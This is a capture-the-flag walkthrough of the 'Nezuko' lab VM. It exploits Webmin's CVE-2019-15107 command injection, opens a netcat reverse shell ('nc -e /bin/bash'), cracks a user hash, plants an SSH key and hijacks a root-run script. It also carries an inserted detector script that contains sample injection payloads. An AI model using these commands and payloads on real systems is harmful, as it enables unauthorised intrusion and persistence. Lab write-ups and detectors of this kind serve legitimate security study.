Nezuko
Easy to Hard
Last updated
My friend asked me to do some checking on their vulnerable machine; unfortunately the machine had some problem and could not be discovered on the network. After several tries and errors, I still can't fix the problem. So I checked with another vulnerable machine to figure out whether my machine had the problem or the vulnerable machine did. XD
I came to try the Nezuko box. Before this, I watched this anime and knew it has its own vulnerable machine. Let's move to the nezuko-chan machine.
PS: in this testing, I assume that nezuko-chan and my machine are in the same subnet, using a host-only adapter for both machines.
As usual, I will start by scanning the ports of the nezuko machine, using a simple command:
nmap -p- --open -A -oN nezukoport -vv nezuko
-p- = scan all ports
--open = show open ports only
-A = aggressive scan (service/version detection, OS detection, default scripts, traceroute)
-oN nezukoport = save the normal output into the file nezukoport
-vv = very verbose
The result shows some interesting ports. Ports 22 and 80 seem nothing interesting. But look at port 13337: it appears to be running MiniServ 1.920, which is Webmin.
After doing some research, this port is vulnerable to CVE-2019-15107. The parameter old in password_change.cgi contains a command injection vulnerability. Interesting, right? We can inject our malicious payload inside password_change.cgi.
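As an added defender's-side example (not from the original post), here is a small Python detector for the CVE-2019-15107 pattern described above: it flags POST requests to password_change.cgi whose old parameter carries shell metacharacters. The record format, user names and request bodies are constructed for the example, in the shape a reverse proxy or WAF log might supply them.

```python
import re
from urllib.parse import parse_qs

# Constructed sample of requests as a reverse proxy or WAF might record them:
# METHOD <tab> PATH <tab> URL-encoded POST body. Users and values are made up.
SAMPLE_REQUESTS = """\
POST\t/password_change.cgi\tuser=alice&pam=&expired=2&old=Summer2019&new1=Winter2019&new2=Winter2019
POST\t/password_change.cgi\tuser=alice&pam=&expired=2&old=x%7Cid&new1=x&new2=x
GET\t/session_login.cgi\t
POST\t/password_change.cgi\tuser=bob&pam=&expired=2&old=pw%60id%60&new1=a&new2=a
POST\t/password_change.cgi\tuser=carol&pam=&expired=2&old=p%24%28id%29&new1=a&new2=a
"""

# Shell metacharacters that have no business in a password field when the
# value is going to be handed to a shell: pipes, separators, backticks, $( ).
SHELL_META = re.compile(r"[|;&`\n]|\$\(")

def parse_record(line):
    """Split one tab-separated record into (method, path, body)."""
    method, path, body = (line.split("\t", 2) + ["", ""])[:3]
    return method, path, body

def is_injection_attempt(method, path, body):
    """True if a POST to password_change.cgi carries shell syntax in `old`."""
    if method != "POST" or not path.endswith("/password_change.cgi"):
        return False
    params = parse_qs(body, keep_blank_values=True)
    return any(SHELL_META.search(v) for v in params.get("old", []))

def scan(records_text):
    """Return (line_no, user, old_value) for every flagged record."""
    hits = []
    for no, line in enumerate(records_text.splitlines(), start=1):
        if not line.strip():
            continue
        method, path, body = parse_record(line)
        if is_injection_attempt(method, path, body):
            params = parse_qs(body, keep_blank_values=True)
            user = params.get("user", ["?"])[0]
            hits.append((no, user, params["old"][0]))
    return hits

if __name__ == "__main__":
    for no, user, old in scan(SAMPLE_REQUESTS):
        print(f"line {no}: suspicious password_change.cgi request, user={user!r}, old={old!r}")
```

A legitimate password change (line 1 of the sample) passes untouched, while the three records carrying a pipe, backticks or $( ) are reported with the affected user.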
Next, let's look with searchsploit to find a ready-to-use payload. For this case, I'm not using Metasploit.
After downloading the payload, let's try it to see whether the nezuko machine is vulnerable to this or not.
HMMM.... Nezuko chan, your machine is VULNERABLE...Haiyaa....
After we confirm this machine is vulnerable, let's modify the payload a little bit to make it connect back to our netcat listener.
Our final code will look like this.
nc -e /bin/bash Machine_IP port
Before we run this payload again, make sure our listener is up.
Everything ready, let's push the ENTER button.
We are in as nezuko. HmHm. Let's do some recon here to find any interesting part.
The Nezuko machine appears to have two users: zenitsu and nezuko
HM HM,
We got a directory and a text file.
Looking into nezuko.txt, we got the first flag.
Next, I tried to move into zenitsu. And I got it. No permission denied.
And I can read the file which contains the second flag. How amazing this machine is.
Before that, moving to the directory to_nezuko. It has something fishy.
This script allows us to escalate to the root user by exploiting the script.
Since we know only zenitsu is allowed to modify this script, we need to be zenitsu. In order to be zenitsu, we have to know their password. How can we find the password???
HERE
cat /etc/passwd
We got the hash for zenitsu. Let's crack this hash using John the Ripper.
Crack it.
I got the credential. Let's change to zenitsu.
Unfortunately the user can't be changed. I noticed that this is not a stable shell, so I need a stable shell to execute this command. Remember, earlier in the nezuko dir we found .ssh. Let's put our SSH public key into authorized_keys.
Creating an RSA key
ssh-keygen -t rsa
Now it will create an RSA key pair. Let's name it abg.
We got these 2 files. Let's put abg.pub into authorized_keys on the nezuko machine.
Now we can close our listener and connect to the nezuko machine using ssh.
Now we have an interactive shell. Let's continue with our last part.
Since we can change into zenitsu, let's modify the script.
Put our listener up and wait for several minutes.
Waiting for the job to be done. Waiting... waiting.... Waiting..... ANDD!!
Yes, we're in. We got the last flag.
I would like to say thank you for preparing this challenge. I will rate this box as an easy challenge. Thank you for reading and taking the time for it.
Nezuko and Zenitsu, I pwned you. Don't give up chasing your dream, Zenitsu. I feel you. HEHE